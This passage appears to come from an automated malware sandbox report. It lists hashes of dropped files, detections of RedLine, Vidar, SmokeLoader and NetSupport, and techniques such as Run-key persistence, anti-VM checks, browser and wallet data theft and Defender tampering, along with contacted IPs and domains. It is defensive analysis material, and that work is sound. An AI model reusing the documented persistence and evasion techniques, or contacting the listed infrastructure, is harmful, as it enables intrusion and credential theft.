| SHA256 | 126daa976d1eaec1bd68eb53748caa325fc537f865051dd0d5f09d599175861a |
| SHA512 | 655b45bcf75a79c174caf6fae84560980511d068f67a89883f70b264e88983f729c604b3484fdcb8d8f8a83105e43d740fe70e7a006806136bc423453d769655 |
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
| MD5 | cfa84b10c7c5ff391859a425abae49e7 |
| SHA1 | 2aa794ec012ad2491b463c983b0a7b8a3beb72c4 |
| SHA256 | 07c1c45477b082547fe2b3ad9bea525ffca2aebc80bc6c96b1f263904db7fbd1 |
| SHA512 | f6b9ac777f9b357b4da4f5653f562631b55514516eb20c2fda63d85d15ed5d572e14887e5f0a10ebdc494188d2da3af7d53171159ef303719f12def0a4f8f5db |
C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe
| MD5 | 6aa5e25e5c5fdfa19d40137e738792bd |
| SHA1 | 86f1485825d2f18fc5c03baca37cf5d6755801a8 |
| SHA256 | 504f42eb4afa952ce6178e5e09d9d75274005a1334f1cd965015e147c0d72160 |
| SHA512 | 5e101d4943d002e406495d5111f33b931b5c6db986c244d1fb209965de1e251b84f57683c2699002b41995d6a101d88076a2462404b63f07d584d25726294071 |
C:\Users\Admin\AppData\Local\Temp\is-BQM84.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp
| MD5 | ffcf263a020aa7794015af0edee5df0b |
| SHA1 | bce1eb5f0efb2c83f416b1782ea07c776666fdab |
| SHA256 | 1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64 |
| SHA512 | 49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a |
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
| MD5 | aed57d50123897b0012c35ef5dec4184 |
| SHA1 | 568571b12ca44a585df589dc810bf53adf5e8050 |
| SHA256 | 096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e |
| SHA512 | ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c |
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\C319.bat
| MD5 | 491e5751b86cff00665f8791f26563b0 |
| SHA1 | c4e0ee49cd5e2816960a0f880778b3d18aa84234 |
| SHA256 | f1f10e139d0e31ad61f9ed9cf5faabd9575cd143fab5354d38dd43cb0a7e3ec4 |
| SHA512 | 6f2622d334807234d1b7c796d5e070a5a031a24866f1ebba1abbfc5b64c9aea048240ff6d15e31f3461286533617aaeef937ddf8b3a3b0762408d5f12e0403bd |
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe
| MD5 | b019efc4814c7a73b1413a335be1fa13 |
| SHA1 | 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2 |
| SHA256 | a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e |
| SHA512 | d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b |
C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\itdownload.dll
| MD5 | d82a429efd885ca0f324dd92afb6b7b8 |
| SHA1 | 86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea |
| SHA256 | b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3 |
| SHA512 | 5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f6I3pBrbcTucpuiGuN7jQPmx.exe.log
| MD5 | e07da89fc7e325db9d25e845e27027a8 |
| SHA1 | 4b6a03bcdb46f325984cbbb6302ff79f33637e19 |
| SHA256 | 94ab73c00494d10a2159175b81e23047621451e3a566e5a0b1222379db634aaf |
| SHA512 | 1e33e34595ebb6ce129d0244199d29722c916c036da542c3001f84b10a964b96cec7a9fdd19e120d7840614b307b504be993a4f8538d54382aa4944575476dda |
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
| MD5 | 29903569f45cc9979551427cc5d9fd99 |
| SHA1 | 0487682dd1300b26cea9275a405c8ad3383a1583 |
| SHA256 | eec05dc9ade2a7ee74ea5fb115bdd687b457d1f81841238a61e9775d6cc4bfa6 |
| SHA512 | f8f29c163bfabc90ade4981523feb943656cc20a562e5b4f6f2c6788f781408aec39114a129e765332aa0022d154d4516e9cb56bc01762b114833fddb30d23fb |
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
| MD5 | 7fee8223d6e4f82d6cd115a28f0b6d58 |
| SHA1 | 1b89c25f25253df23426bd9ff6c9208f1202f58b |
| SHA256 | a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59 |
| SHA512 | 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4 |
Analysis: behavioral5
Detonation Overview
Submitted
2021-08-24 08:16
Reported
2021-08-24 08:46
Platform
win11
Max time kernel
299s
Max time network
1601s
Command Line
Signatures
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3104 created 3852 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (8).exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (8).exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3104 wrote to memory of 3852 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (8).exe |
| PID 3104 wrote to memory of 3852 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (8).exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (8).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (8).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv O3AFFzQk7k6+SvUlMHNZuQ.0.2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3852 -ip 3852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 1568
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
| Country | Destination | Domain | Proto |
| N/A | 95.101.206.92:80 | go.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | slscr.update.microsoft.com | udp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.64.202:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | N/A | tcp |
| N/A | 37.0.11.8:80 | N/A | tcp |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.36.2:53 | slscr.update.microsoft.com | udp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 72.21.91.29:80 | crl3.digicert.com | tcp |
| N/A | 127.0.0.1:5985 | N/A | tcp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2021-08-24 08:16
Reported
2021-08-24 08:46
Platform
win11
Max time kernel
190s
Max time network
1809s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | N/A |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateProcessExOtherParentProcess
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\is-LBNRK.tmp\ultradumnibour.exe | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\13C6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\13C6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Users\Admin\AppData\Roaming\5949319.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Lyqiwyxugu.exe\"" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\13C6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4256 set thread context of 2100 | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe |
| PID 4820 set thread context of 4432 | N/A | C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe | C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe |
| PID 4832 set thread context of 3084 | N/A | C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe | C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe |
| PID 4884 set thread context of 4328 | N/A | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe |
| PID 2108 set thread context of 7188 | N/A | C:\Users\Admin\Documents\BgqdkscODKWLHjfKwt55fbd5.exe | C:\Users\Admin\Documents\BgqdkscODKWLHjfKwt55fbd5.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | C:\Users\Admin\Documents\euXsNX1fFj42iYiFJ9BI28ku.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-74B40.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-IT9TK.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-PSG2I.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-UK25E.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\javaw.exe | C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-PBP57.tmp | C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Reference Assemblies\Lyqiwyxugu.exe.config | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libCommon.dll | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libMaskVPN.dll | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-4K0GO.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-TVG4R.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-3PBNM.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\IYj4VNGTqK4xxMUpFyjLGAgC.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\MaskVPN.exe | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\polstore.dll | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-THQA1.tmp | C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-5FDGK.tmp\ultramediaburner.tmp | N/A |
| File created | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-5FDGK.tmp\ultramediaburner.tmp | N/A |
| File created | C:\Program Files (x86)\UltraMediaBurner\is-T7V0A.tmp | C:\Users\Admin\AppData\Local\Temp\is-5FDGK.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-VQT1N.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-O5AR1.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-8QN73.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\mask_svc.exe | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\tunnle.dll | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-HVGHE.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-QDDB5.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-7NOFF.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-CDQH4.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\unins000.msg | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\libcueify.dll | C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | C:\Users\Admin\Documents\euXsNX1fFj42iYiFJ9BI28ku.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\ipseccmd.exe | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-64AP5.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-S4561.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-FIIF8.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-O05Q1.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-AUPLB.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-MJCAT.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\UltraMediaBurner\is-QGQBM.tmp | C:\Users\Admin\AppData\Local\Temp\is-5FDGK.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe | C:\Users\Admin\AppData\Local\Temp\is-5FDGK.tmp\ultramediaburner.tmp | N/A |
| File created | C:\Program Files (x86)\Reference Assemblies\Lyqiwyxugu.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
